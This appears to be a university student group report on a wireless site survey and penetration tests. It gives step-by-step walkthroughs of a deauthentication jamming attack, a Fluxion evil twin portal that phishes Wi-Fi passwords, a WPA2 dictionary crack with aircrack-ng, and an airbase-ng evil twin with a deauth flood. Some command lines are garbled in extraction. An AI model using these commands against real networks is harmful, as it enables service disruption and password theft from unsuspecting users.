Professional Documents
Culture Documents
1
3.0 Test Plan/Specification ..................................................................................................................... 34
4.0 Demonstration of walkthrough ......................................................................................................... 36
7.0 Evaluation and Solutions .................................................................................................................. 40
Individual Part: EVIL TWIN ACCESS POINT ATTACK (Abdulaziz Aljawder TP032807) ................... 41
1.0 Introduction: ...................................................................................................................................... 41
2.0 Aim and Objectives: ......................................................................................................................... 42
3.0 Test Plan............................................................................................................................................ 45
4.0 Demonstration of walkthrough ......................................................................................................... 46
5.0 Solution and Recommendations: ...................................................................................................... 52
6.0 Conclusion: ....................................................................................................................................... 52
Reference .................................................................................................................................................... 53
2
1.0 Layout of Site Survey
3
3.0 Heat Map of Site Survey
4
4.0 Site Survey Result
The site survey is done by using Ekhau Heatmapper Software. This site survey is done in APU
Level 6 Block D, outside the classroom of D6-04, Discussion Room. In the figure above, it shows
the WiFi coverage strengthen network is decent by showing light green to left side bottom corner.
It is noticed that few access points, the red circle point is the main access point to be test. The
others access point is from others classroom and outside the discussion room.
From the figure above, it shows many access point with different strength power of the network.
There are many access point because each floor of the building block has to spread the network
connection throughout every corners of the University. In the next section, the researchers will
explain further the site survey based on the diagram above for the network interference within the
area, the packets transmission sniffing in the area, as well as signal transmission jamming to
determine whether it is existing within the tested area.
Signal Jamming is one of the exploits that used in the wireless network environment. Signal
jamming can be used the tools or script to interrupt the wireless communications. It could prevent
users from connecting to the wireless access point. The attacker is allowing to select one target
from the access point to attack it. However, the results will show the users who are using the target
access point could disable to reconnect the network. The process of the attack will be using the
deauthentication packets for sending to the access point. (Thesignaljammer.com, 2018)
Additionally, the wireless protocol has different kind of management frames which is used for
establishing and authenticate the connections. There has one packet called deauthentication frame
could send to access point for affected the network could be disconnected. For Example, an
attacker will choose one place which is that provided the Free Wi-Fi and starts the deauth-attack
to disturb the wireless network to deny all the client's devices cannot access the target network and
block the internet connection to affect user can’t reconnect the wireless network. (Medium, 2018)
5
5.1 Tools and Hardware
Tools will be used in this active attack are:
Websploit
Websploit is an exploitation tool and automated vulnerability assessment. It also an open source
project that could scan and analysis to find out the various type of the vulnerability (Sourceforge.net,
2018). The tools have provided different types of modules which available user to choose for it.
Example, Web Modules, Network Modules, Exploit modules and Wireless Modules (Hacking, 2018).
Each of the modules has listed out the few options of attack that supported in the tools. For
Example, Wi-Fi jammer is one of the attacks that include in the wireless modules.
Aircrack-ng
Aircrack-ng is a tool which consists of different types of tools to capture and examine the data
packets from the wireless network. It has supported to perform the analysis and cracking such as
password cracking and Wi-Fi jamming for the WPA and WPA2 wireless security. It can be used
on different areas of Wi-Fi network security. For Example, monitor, attack, test, and crack. Each
of the function will show different results like monitoring is focused on packet capture and export
data to text files by third party tools. Besides that, the tools can run the attack such as replay attacks,
deauthentication attack, fake access point and more. It also checking and testing the Wi-Fi cards
capabilities to capture and injection the packets while processing the attack. Moreover, it could be
cracking the WEP and WPA 1 and WPA 2. (Aircrack-ng.org, 2018)
6
Airmon-ng is the tool that included in the aircrack-ng package to enable or disable the monitor
mode on the wireless interfaces (Kali Tools, 2017). Although, it can enable the monitor mode to
manage mode on the wireless interfaces.
Airodump-ng is used to capture the packet of raw 802.11 frames and suitable to collect the WEP
by using with the aircrack-ng (Aircrack-ng, 2018). It is capable of the found access point and writes
out some of the files containing the detail of the access point that appears in the nearby area to
show the clients can see the results.
Aireplay-ng will be used for cracking the WEP and WPA1 and WPA2 keys. There have few types
of attack can use deauthentication for capture the WPA handshake data, ARP request injection and
more (Aircrack-ng, 2018).
Comparison Tools
7
-Wi-Fi Jammer -airsev-ng
Based on the comparison table of results, the tools will be chosen is Aircrack-ng to proceed the
Wi-Fi jamming attack. The three types of tools are free to download from the website which has
the RAR file. It needs to extract out from the RAR file to get the data files. All the tools are required
to use the terminal to run the script or command line for doing the attacks. The aircrack-ng is
simple and effective to perform the Wi-Fi jamming.
8
After the process complete, the WiFi want to connect will be show Can’t connect to this network.
9
5.4 Impact of Wi-Fi Jamming
The impact of Wi-Fi jamming can spam the deauth messages to disconnect the target wireless
network and user are unable to reconnect the target network. If the attacker still running the
program, the user will never connect to the internet unless the attacker has stopped running the
program.
It won’t have solutions to stop the attacker from sending the deauthentication packets. It can
prevent the attack from an attacker is the network should be configured and distance also far away
from the attacker devices so the deauth attack will not enable the attacker to scan out at the nearby
area of Wi-Fi networks to compromise it.
There are one of the methods to protect the wireless network from the attacker. It should check the
wireless network is secure and prevent an attacker could easily to aim as a target of the victim's
wireless network.
10
6.0 Interference (Liau Sze Nan TP03415)
In communications and electronic equipment, particularly in telecommunications, interference
refers to anything that modifies or destroys a signal as it propagates along a channel between a
signal source and a receiver. Besides, the lack of wires that makes WLAN so attractive is also the
feature that makes other devices capable of causing Wi-Fi interference. (Juniper, 2017) Wi-Fi
interference is a common and troublesome issue, it is because wireless signals travel through the
atmosphere, and they are susceptible to different types of interference than standard wired
networks. (Harwood, 2009) Therefore, this is an important consideration when using wireless
networks and interference to attenuate wireless signals. The impact of wireless interference include,
low signal strength in the Wi-Fi menu, unstable connection to the Internet when using Wi-Fi
connection and slow file transfers rate between computers when the Wi-Fi connection is slow or
unstable.
11
wireless interference happen. Below are show the table of wireless interference level depend of
the density of the materials.
• Microwave — the closer the router is to microwave the more network interference can
expect to occur when the microwave is in action. That is especially true for older wireless
routers that just like microwaves operate in the 2.4 GHz spectrum.
• Cordless Phone — again 2.4 GHz spectrum. Just like the previous item these phones can
cause large signal interference. Wi-Fi Interference will occur during active call time.
• Other Wireless Devices — any wireless device can technically be the reason for a signal
interference. These can be wireless speakers, baby monitors, garage door openers, etc.
12
Some other wireless devices operating in 2.4 GHz or 5 GHz spectrum, including
microwave transmitters, wireless cameras can also contribute to wireless interference.
(NetSpot, 2018)
6.5 Analysis
Based on the result of site survey, the heat mapper is show that the APU New Campus Level 6,
Block D, Discussion Room area are most coverage in green which mean the Wi-Fi signals
coverage is quite good. It show the discussion room that the Wi-Fi interference is very low.
However, the site survey is performed when the discussion room is less persons and the level 6
block D is less classes at around 4 p.m. The result will be different if the selected time is on working
time or hot time or the area has accommodate a lot of persons.
This is because students will always bring their gadget such as laptops, smartphones and
etc, which all of its will occur radio frequency interference. Since most of the wireless networks
transmit their signals in a narrow radio frequency range around 2.4 GHz, it's common for devices
on the same frequency to affect the wireless signal. (Mitchell, 2018) Besides, the APU New
Campus Level 6, Block D, Discussion Room mainly occupied by 12 tables with 48 chairs and the
floor of the is covered with carpet. Although the discussion room facility does not have wireless
features, but it can be caused physical obstacles. All of the physical obstacles in the Block D, Level
6 discussion room may causes reflection, refraction, diffraction, scattering or absorption
phenomena that impact the Wi-Fi signal. (Cook, 2015)
13
6.6 Comparison of Software
Ekahau HeatMapper
HeatMapper is the free version of networking design toolmaker Ekahau’s Wi-Fi Site and Survey
Planner. It is an enterprise Wi-Fi planning and wireless site survey tool. It offers an attractive
graphical overview of the airwaves around the floor plans and even some information about the
security setting on detected Wi-Fi networks. (Geier, 2017) Below are the features of Ekahau
HeatMapper:
NetSpot
NetSport is a Wi-Fi stumbler and map-based survey tool, but for free home edition reviewed, the
map-based survey tool is disabled. It available for both Windows and Mac OS X. On the simple
GUI, network details of the SSIDs are shown bold and clear. The signal level are shown in negative
dBm values and percentages. It doesn’t show hidden network at all on the network list. (Geier,
2017) Below are the features of NetSport:
14
Creator Ekahau NetSpot
Operating System Windows Windows and Mac OS
Support Network Supports 802.11n, as well as a/b/g Any 802.11 network
Simulated APs & Yes Yes, Pro version only
Coverage
Simultaneous active Yes Yes
and passive surveys
Furthermore, wireless networks allow more than 1 person to communicate with another
network source at any one time. This sharing of connection means that the more subscribers
utilizing the network, the more devices the access point has to try and communicate with
instantaneously. The point of access has to delegate its resources to each subscriber individually
per the amount of transmitting radios it operates on. (Solutions, 2018) To solve this issue, APU
has broadcast Staff APU and BYOD SSID for APU staffs and students. The Staff APU SSID is
created for all the APU staffs only and the BYOD SSID is supports 5 GHz Wi-Fi signal.
Nowadays, some of the devices are supporting 5GHz Wi-Fi signal, students can switch to BYOD
instead of using the 2.4 GHz.
15
7.0 Threats and Issues to WLAN (Abdulaziz Aljawder TP032807)
• Denial of Service: In this type of attack, an intruder floods the network with valid or invalid
messages that affect the availability of network resources. Due to the nature of radio
transmission, WLANs are very vulnerable to denial of service attacks.
• Spoofing and session hijacking: An attacker can access privileged data and resources on the
network by assuming the identity of a valid user. This happens because the 802.11 network does
not authenticate the source address, which is the media access control (MAC) address of the
frame. Therefore, an attacker could spoof the MAC address and hijack the session.
• Eavesdropping: This involves exploiting the confidentiality of data transmitted over the
network. By its very nature, wireless LANs deliberately radiate network traffic into space. This
makes it impossible to control who can receive signals in any wireless LAN installation.
7.1 Solutions
• Change Default SSID: The Service Set Identifier (SSID) is a unique identifier attached to the
packet header sent over the WLAN, which acts as a password when the mobile device attempts
to connect to a particular WLAN. The SSID distinguishes one WLAN from another, so all access
points and all devices attempting to connect to a particular WLAN must use the same SSID. In
fact, it is the only security mechanism the access point needs to enable association when the
optional security feature is not activated.
16
• As shown, the wireless AP is behind a corporate firewall in a typical wireless implementation.
This type of implementation opens a big hole in the trusted network space. A secure way to
implement a wireless AP is to place it behind a VPN server. This type of implementation
provides high security for wireless network implementations without adding significant overhead
to the user.
• VPN is a more comprehensive solution that authenticates users from untrusted spaces and
encrypts their communications so that someone can't intercept it.
• TKIP: The Temporary Key Integrity Protocol (TKIP), originally called WEP2, is designed to
address all known attacks and defects in the WEP algorithm.
17
Individual Part (Evil Twin Attack) (Loh Choon Way TP041264)
1.0 Statement
An evil twin is a fraudulent Wi-Fi access point that appears to be legitimate but is set up to
eavesdrop on wireless communications. The evil twin is the wireless LAN equivalent of the
phishing scam in the site survey
2.0 Aim
To steal the passwords of unsuspecting users, either by monitoring their connections or by
phishing, which involves setting up a fraudulent web site and luring people there.
When users log into unsecured (non-HTTPS) bank or e-mail accounts, the attacker intercepts the
transaction, since it is sent through their equipment. The attacker is also able to connect to other
networks associated with the users' credentials.
Wireless stations generally do not generally connect to specific Aps, they connect to any AP with
a given SSID and the best signal. Worse, many stations automatically reconnect to any SSID
used in the past. Just placing an Evil Twin near business users can be enough to trick their
wireless devices into associating with a phony AP. An attacker who gets impatient waiting for
users to roam to the Evil Twin can use a tool like Aireplay to deauthenticate everyone, forcing
immediate reassociation. (rootsh3ll, 2018)
18
Fake access points are set up by configuring a wireless card to act as an access point. They are
hard to trace since they can be shut off instantly. The counterfeit access point may be given the
same SSID and BSSID as a nearby Wi-Fi network. The evil twin can be configured to pass
Internet traffic through to the legitimate access point while monitoring the victim's connection,
or it can simply say the system is temporarily unavailable after obtaining a username and
password.
19
5.0 Selection tools - comparison tool
Fluxion
Fluxion is the future blend of technical and social engineering automation that trick a user into
handing over the Wi-Fi password in a matter of keystrokes. Specifically, it's a social engineering
framework using an evil twin access point (AP), integrated jamming, and handshake capture
functions to ignore hardware and focus on the "wetware." Tools such as Wifiphisher execute
similar attacks, but lack the ability to verify the WPA passwords supplied.
Fluxion evolved from an advanced social engineering attack named Lindset, where the original
tool was written mostly in Spanish and suffered from a number of bugs. Fluxion is a rewritten
attack to trick inexperienced users into divulging the password/passphrase of the network.
Fluxion is a unique tool in its use of a WPA handshake to not only control the behaviour of the
login page, but the behaviour of the entire script. It jams the original network and creates a clone
with the same name, enticing the disconnected user to join. This presents a fake login page
indicating the router needs to restart or load firmware and requests the network password to
proceed. Simple as that.
Features
20
• A fake DNS server is launched in order to capture all DNS requests and redirect them
to the host running the script
• A captive portal is launched in order to serve a page, which prompts the user to enter
their WPA password
• Each submitted password is verified by the handshake captured earlier
• The attack will automatically terminate, as soon as a correct password is submitted
Airgeddon
Airgeddon is a multi-use bash script for Linux systems to audit wireless networks. Airgeddon
will show lot of option with a menu that required different attack to use on the victim. Each of
the attack design different effect to perform a wireless attack with using multi use bash script.
Airgeddon including DDOS attack, WPS attack, Rogue Access Point, Evil Twin attack and
others.
Features
21
Comparison table of tools
For the vulnerability testing will be choosing Evil Twin Attack (Fluxion) to proceed the testing.
Fluxion can be git clone from the GitHub and using the terminal to run the command line.
Fluxion is a simple and easy tools for do the testing.
22
2. Run Fluxion
If all required file are updated and installed then fluxion will run, otherwise a list of unavailable
files will show.
For this go to install directory and open terminal there. Now, run: ./install.sh
4.Cracking WiFi
Select Language
23
Select Channels, it will start scanning your nearby networks on all channels.
24
Select pyrit
25
After handshake is captured close both windows and in Status Handshake select Check
handshake.
26
Select Login Page
5. Result
Now wait for the user to connect to our open twin Ap and enter key for authentication.
After a user is connected he/she has to enter the password. As soon as target enters the password
so attacker can get the password.
27
28
29
7.0 Conclusion
Given the success of Wi-Fi networks, wireless clients are vulnerable to a variety of threats such
as the evil twin attack. This attack evolves from traditional phishing attacks and is well known as
the wireless version of email phishing scams. The attack requires no special equipment and is
easy to implement. Although few solutions exist today, most of them are designed to work on
corporation wireless devices. Two solutions were discussed with emphasis on their limitations.
Users can protect themselves by disabling their wireless network interface card (NIC) when not
connected to a wireless network. Users should also connect to Wi-Fi networks manually and
avoid setting up the device to connect automatically. When entering information on the web one
should always check the address bar to determine whether the web browser connection is secure
or not. The most powerful thing for the user to remember is to be vigilant, do not take things for
granted, and always confirm connections. Make sure to limit details in the conclusion. Keep it
succinct.
30
Individual Part - Wi-Fi Password Dictionary Attack (Liau Sze Nan
TP034915)
1.0 Statement
Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) are two security protocols
and security certification programs developed by the Wi-Fi Alliance to secure wireless computer
networks. (Rouse, 2014) Although, WPA2 is widely in use to secure our wireless network today,
it still has vulnerable to perform attack such as dictionary attack. A dictionary attack is an attempt
to attack a password or authentication mechanism type brute force technique by trying hundreds
or sometimes millions of possible possibilities, such as words in a dictionary to determine its
decryption key or password. This is a method of breaking into a password-protected computer or
server by systematically entering every word in a dictionary as a password. Dictionary attacks are
often successful because many users and businesses use ordinary words as a Wi-Fi passwords.
(Inc, 2018) It successful against systems that employ multiple-word phrases, and unsuccessful
against systems that employ random combinations of uppercase and lowercase letters mixed up
with numerals. (Rouse, 2005)
Aim
To study the penetration testing of dictionary attack by using the aircrack-ng techniques
Objective
31
2.0 Selection of Tools
Aircrack-ng
Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and
WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs. It works with any wireless
network interface controller whose driver supports raw monitoring mode and can sniff 802.11a,
802.11b, and 802.11g traffic. It supported several operating systems such as Windows, Linux,
BSD, and OS X. It usually used to monitoring packet capture and export of data to text files for
further processing. Besides, it can be used to initiate attacks such replay attacks, deauthentication,
fake access points and others via packet injection. Furthermore, it also can used for testing purpose
such as checking WiFi cards and driver capabilities to capture and injection and cracking WEP,
WPA and WPS2 PSK. (Aspyct.org, 2018)
Aircrack-ng Features
Name Description
aircrack-ng Cracks WEP keys using the Fluhrer, Mantin and Shamir attack (FMS)
attack, PTW attack, and dictionary attacks, and WPA/WPA2-PSK using
dictionary attacks.
airdecap-ng Decrypts WEP or WPA encrypted capture files with known key.
Airmon-ng Placing different cards in monitor mode.
aireplay-ng Packet injector (Linux, and Windows with CommView drivers).
airodump-ng Packet sniffer: Places air traffic into pcap or IVS files and shows
information about networks.
airtun-ng Virtual tunnel interface creator.
packetforge-ng Create encrypted packets for injection.
ivstools Tools to merge and convert.
airbase-ng Incorporates techniques for attacking client, as opposed to Access Points.
airdecloak-ng Removes WEP cloaking from pcap files.
32
airolib-ng Stores and manages ESSID and password lists and compute Pairwise
Master Keys.
airserv-ng Allows to access the wireless card from other computers.
buddy-ng The helper server for easside-ng, run on a remote computer.
easside-ng A tool for communicating to an access point, without the WEP key.
tkiptun-ng WPA/TKIP attack.
wesside-ng Automatic tool for recovering wep key.
KisMAC
KisMAC is a wireless network discovery tool for Mac OS X. It has a wide range of features, similar
to those of Kismet. The program is geared toward network security professionals and is not as
novice-friendly as similar applications. It scan for networks passively on supported cards including
Apple's AirPort, and AirPort Extreme, and many third-party cards, and act on any card supported
by Mac OS X. It cracking of WEP and WPA keys, by brute force, and exploiting flaws such as
weak scheduling and badly generated keys is supported when a card capable of monitor mode is
used. (Software, 2018)
KisMAC Features
33
• AppleScript-able
• Kismet drone support (capture from a Kismet drone)
1. Install the VMware Workstation Pro 12 or above and setup the Kali Linux Operating
System - kali-linux-2018.3-vm-amd64 into the VMware.
2. Insert or plug in the Wireless TP link adapter and make sure the Kali Linux Operating
System is connected to the internet.
34
3. Create or download a password dictionary and make sure the Wi-Fi Router or Hotspot is
turning on.
4. Set the Wireless TP link adapter interface to monitor mode by using command airmon-ng.
5. Type the command airodump-ng to scan and monitor the surrounding Wi-Fi or Hotspot
available.
6. Select a target Wi-Fi and generate a handshake file.
7. Type the command aireplay-ng to deauthenticate client or user.
8. Type the command aircrack-ng to crack the handshake file with the password dictionary.
9. Connect to the target Wi-Fi or Hotspot by using the crack password.
35
4.0 Demonstration of walkthrough
1. Check the Wireless TP link adapter interface
Insert or plug in the Wireless TP link adapter and make sure the Kali Linux Operating System is
connected to the internet. To make sure the Wireless TP link adapter is connected to the Kali Linux
Operating System, type “ifconfig” command to list the configuration of network interface. Base
on the diagram above, the wlan0 is the Wireless TP link adapter interface.
Create or download a password dictionary and locate it where you can find. Base on
the diagram, the testing.txt is my password dictionary and located at /root/Desktop.
36
Base on the diagram above, type “airmon-ng” to find the connected network interface. The wlan0
is the Wireless TP link adapter interface.
Base on the diagram above, in the command prompt type “airmon-ng start wlan0” set the wlan0
network interface to monitor mode and it will become wlan0mon.
37
Base on diagram above, type the command “airodump-ng wlan0mon” to scan the surrounding
target Wi-Fi available. After that, press CTRL + C to stop the scanning, when you found the target
Wi-Fi. Now, the testing ESSID is our target Wi-Fi, is a WPA2 network security technology,
channel 1 and the BSSID is 84:C7:EA:7D:EE:7B.
Base on the diagram above, generate a handshake file with the command “airodump-ng –channel
1 –bssid 84:C7:EA:7D:EE:7B – write handshake wlan0mon”
38
After that, it is important to have a user device to connect the target Wi-Fi. When a user device is
connecting to the target Wi-Fi, it will show the user device’s BSSID on STATION. Base on the
diagram above, the user device’s BSSID is 64:09:80:CC:1C:BC which is list on STATION.
Base on the diagram above, type the command “aireplay-ng --deauth 5 -a 84:C7:EA:7D:EE:7B -c
64:09:80:CC:1C:BC wlan0mon” to deauthenticate the user.
39
Base on the diagram, the password of the testing target Wi-Fi is “nibuzhidao”
So that, the Wi-Fi passwords need unique qualities, regular updating and a credible
password manager. Create strong passwords, the stronger of user’s passwords, the harder it will
be to guess. Stronger passwords can include by using combination of special characters such as
symbols, numbers, and capital letters to improve the complicated of password. Do not use some
common passwords, such as family’s name, nickname or birthday. And last but not least, change
the Wi-Fi password one a month to avoid users can guessing your Wi-Fi password or continuously
used your Wi-Fi.
40
Individual Part: EVIL TWIN ACCESS POINT ATTACK (Abdulaziz
Aljawder TP032807)
1.0 Introduction:
Over the years, wireless signals have evolved from hypothetical observations to easy-to-apply
sciences that play an important role in many aspects of modern life. Due to the discovery of radio
waves in 1880, wireless communication became conceivable, which led to the main exhibition of
telegraph communication. In 1901, operators transmitted short-range wireless signals between
Canada and the United Kingdom, the first long-distance wireless transmission. Later, Edwin
Armstrong discovered portable radios, FM frequencies and super regenerative receivers, all of
which laid the foundation for future developments in the field.
With innovative innovation, in 1970, Professor Norman Abramson created Alohanet, a pioneer
in Ethernet and future wireless signals. His development uses radio tags to quickly meet less
demanding information transmission needs. Later, in 1979, the main business simple mobile
phone framework was accessible in Japan. After a period of time, the progress of various mobile
phones in different countries is constantly increasing, and every mobile phone is striving to
expand the innovation of its pioneers. In 2000, South Korea promoted the widespread use of the
world's first 3G commercial system, and until 2009, 4G systems became popular. This latest
development also addresses a variety of device changes that will flock to 2.4 GHZ to ensure
more data transfer. Experts speculate on the future of wireless networks, and many predict that
these systems will continue to provide more accessibility to all users.
Thanks to the rapid development of wireless LANs and the widespread deployment of Wi-Fi
devices, it can help users easily access the network and allow users to connect to any Wi-Fi
wireless Internet hotspot in public places. As a result, they become more vulnerable to fraud and
identity theft.
41
Malicious evil twin attacks are attacks that clone a victim's Wi-Fi access point to a legitimate
access point. This attack on wireless networks has been known and documented for a long time.
To perform the attack, the routing access point broadcasts the SSID that the victim system needs
to interface with. Typically, clients connect to known networks as they enter the range. This is
especially true for public hotspots that do not use encryption because the client cannot
distinguish between real and malicious access points. If the attacker also provides Internet
access, the user will not notice any differences after connecting. Therefore, the usual
recommendation is to always use WPA2 encryption.
When using a public key, the connection to the rogue access point will not succeed because the
entry point cannot decrypt the packet from the client and vice versa. In any case, very little
information about how it affects WPA2 Enterprise.
Therefore, when a victim accesses a fake access point, the attacker can easily access the
information. An attacker could use a smartphone or any Internet-enabled device to create a
malicious dual access point. The attacker will access a legitimate access point. The clone access
point is then initiated and the same personal radio signal as the legitimate access point is sent.
After that, the victim will notice that there are two types of access points with the same network
name. The evil twin attack is not a new phenomenon in wireless transmission; it is called a base
station clone or honeypot. Now, enterprises have begun to use VPNs to protect corporate data
and employees using wireless devices from malicious attacks.
42
network. Under this type of attack, an attacker can easily steal the victim's information without
having to create additional network connections for the Internet.
It can be assumed that an attacker can operate a malicious access point that competes with a real
access point in a location such as a cafe. In addition to accessing secret key material, a rogue
access point can fully emulate a trusted access point. However, an attacker cannot destroy or
replace a trusted access point. In particular, an attacker cannot manipulate the communication
channel to manipulate the light of the access point in any other way that is external to the access
point. An attacker can manipulate a malicious access point in a hidden manner. However, it can
be assumed that any rogue access point is installed in a conspicuous place and the customer may
mistake it for a real access point and the cafe staff will discover and delete those access points.
In our scenario, we cannot assume that the user's device and the wireless access point share a key
or have a public key certificate signed by a trusted third party. Instead, devices exchange public
keys over unsecured wireless channels and use them to protect their communications. The user
blocks man-in-the-middle attacks by verifying the exchanged keys on a low-bandwidth (verified)
visible channel. This can be done efficiently with the "short authentication string" protocol
because they have been described and proven to be safe.
43
Hardware and Software Requirements:
The hardware and software in the table below show the minimum requirements that researchers
need to perform this attack simulation.
Hardware &
software Description
Function - To provide network connection.
Kali Linux 2.0 Limitation - The researcher will have to learn Kali Linux commands.
44
- Wireshark
- CORE Impact
Function - It allows the user to install and run other OS on a single
virtual machine.
Virtual Purpose - It will allow the researcher to run the Kali Linux 2.0
Machine 10 Limitation - It use the some of the laptop resources such as the Memory
and processing time.
- Thus, it is slower than an OS which is directly install on the
laptop.
Comparison The researcher could use:
- RVTools
- VMVision Manager.
45
connect to the fake access
point.
Step: 1
Evil twin attacks will require VMware machines, Kali Linux 2.0 and PROLINK wireless
adapters to attack. First you need to install a VMware machine on an Internet-enabled device and
then install Kali Linux 2.0 on a VMware machine. After installing Kali Linux and VMware, plug
the wireless adapter into the device.
Step 2:
Create an access point that is controlled by an attacker. Here, the study created an access point
controlled by an attacker. Also, he will use a smartphone to connect to the virtual access point. A
46
fake access point will be used to promote the same SSID as the original network. So when
someone sees their phone or laptop, they can see the same name as the original network. Users
may accidentally connect to the network and think this is their own network. Once a connection
is established, an attacker can eavesdrop on the entire network and obtain valuable information.
• In here I open terminal and type ‘iwconfig’ to check if monitor mode is on.
Step: 3
We have to create a monitoring mode. Because the network must be scanned to get the ESSID
and channel. So, airmon-ng checks. As you can see, we found three processes that could cause
problems. We will have to kill these processes by typing 'airmon-ng check kill' so they don't
interfere with our scans.
Step:4
47
Now we have to start up to monitor mode interface. So we type: ‘airmon-ng start wlan0. And we
should have a monitor mode on our interface.
Step:5
Step:6
Now, we will have to start scanning the network. We type ‘airodump-ng wlan airbase-ng –a
AA:AA:AA:AA:AA:AA –essid “ALFA”- c 6 wlan0’.
As you can see, the researchers are using WEP encryption. The type of encryption is less
important. This attack applies to WPA or WPA2. Therefore, the main information we need is the
ESSID, which is basically the ID or name of the network. We need the channel on which it is
located. Therefore, we will simulate this information by creating our own fake access points. Air
interface points: AA: AA: AA: AA: AA: AA - essid "ALFA" - c 6 wlan0.
48
Step: 7
Kali Linux provides a tool called "airbase-ng" that can be used to create fake access points. Now
we will create a fake access point. To do this, we need a BSSID and create a standard name. It
must be similar to the original address. Here, the researchers have copied essid to their original
access point so that when users view the access point, they will not be able to distinguish
between the differences. This is the command: 'airbase-ng -a AA:AA:AA:AA:AA:AA -
essid"ALFA" - c 6 mon0. The following image shows a virtual access point that was successfully
created.
Step:8
To make sure, the fake access point is running, we go to a new terminal and type in: ‘airodump-
ng –channel 6 wlan0.
49
Once we press the Enter key, we can see that the wireless network card is scanning the fake
access point. The figure below shows two "ALPHA" access points, one of which is a pseudo
access point and the other is the original access point. Users don't know that one is actually fake
and the other is original.
Step: 9
Now we will disconnect the user from the original access point and force him to connect to the
virtual access point. The only way is through a denial of service attack. We are going to use a
floating denial of service attack that will continually attack users and prevent them from
authenticating with the original access point. After a while, they should automatically connect to
the pseudo access point, which is an open authentication. Once they have established a
connection, the study will get their details. We can eavesdrop on what they do on the internet.
For the unauthentication attack, we will use the unauthentication packet. The user or client
typically uses this packet to terminate the connection. Here, the researchers will use it for his
advantage. In order to prevent users from reconnecting to the original access point, the researcher
will send a flood denial of service packet so that reconnection can be prevented. And they
establish a connection between the next closest access point, which will hopefully stop the
pseudo access point.
The way to study is to open a new terminal and type it; 'aireplay-ng - deauth 0 -a
00:C0:CA:74:CC:7A mon0. The following image shows a DE authentication packet sent to a
smartphone. And the smartphone is not connected back to the original access point.
The diagram blow show attack keeps on sending those packet to the victim smart phone.
50
Step: 10
The result is that the attack was very successful because the victim smartphone was not
connected to the original access point. So, after a while, it will try the next closest access point
and connect to the virtual access point again instead of the original access point. Researchers can
get valuable information from users.
Now the attacker can collect valuable information from the user smartphone.
51
5.0 Solution and Recommendations:
The problem may be less problematic by using physical sensors and link layer information to
collect and locate Evil Twin APs in a distributed architecture by using sensors throughout the
network. It can be used in many enterprise WLANs. and to Use a Hybrid approach for detection
of Evil Twin.
6.0 Conclusion:
Research simulations have been successful. Researchers can execute and attack and discover
vulnerabilities. In addition, the researchers provided solutions and recommendations to prevent
information theft. Evil twin attacks pose a serious security risk to the use of hotspots. Therefore,
it is highly desirable to equip users with additional tools and methods for verifying the APs to
which they are connected to ensure that these are real and not trapped by an attacker.
52
Reference
1. SourceForge. (2018). WebSploit Framework. [online] Available at:
https://sourceforge.net/projects/websploit/ [Accessed 10 Oct. 2018].
2. Hacking, E. (2018). Kali Linux Tutorial - Websploit Framework. [online] The World of IT &
Cyber Security: ehacking.net. Available at: https://www.ehacking.net/2013/05/kali-linux-
tutorial-websploit-framework.html [Accessed 10 Oct. 2018].
3. Thesignaljammer.com. (2018). What is a WiFi Jammer and Why You Might Need One.
[online] Available at: https://www.thesignaljammer.com/blog/what-is-a-wifi-jammer-and-why-
you-might-need-one/ [Accessed 10 Oct. 2018].
4. Medium. (2018). Hacking and jamming WiFi networks – Jack Mahoney – Medium. [online]
Available at: https://medium.com/@jackmahoney/hacking-and-jamming-wifi-networks-
d2a6ec51f0c2 [Accessed 10 Oct. 2018].
7. rootsh3ll. (2018). Evil Twin Attack [A Step by Step Guide] (Updated 2018). [online] Available
at: https://rootsh3ll.com/evil-twin-attack/ [Accessed 10 Oct. 2018].
53
8. Aspyct.org, 2018. Aircrack-ng. [Online]
Available at: https://www.aircrack-ng.org/
[Accessed 28 September 2018].
54
14. Harwood, M., 2009. Person IT Certification. [Online]
Available at: http://www.pearsonitcertification.com/articles/article.aspx?p=1329709&seqNum=3
[Accessed 28 September 2018].
55
20. Rouse, M., 2014. TechTarget. [Online]
Available at: https://whatis.techtarget.com/definition/Wi-Fi-Alliance
[Accessed 1 October 2018].
56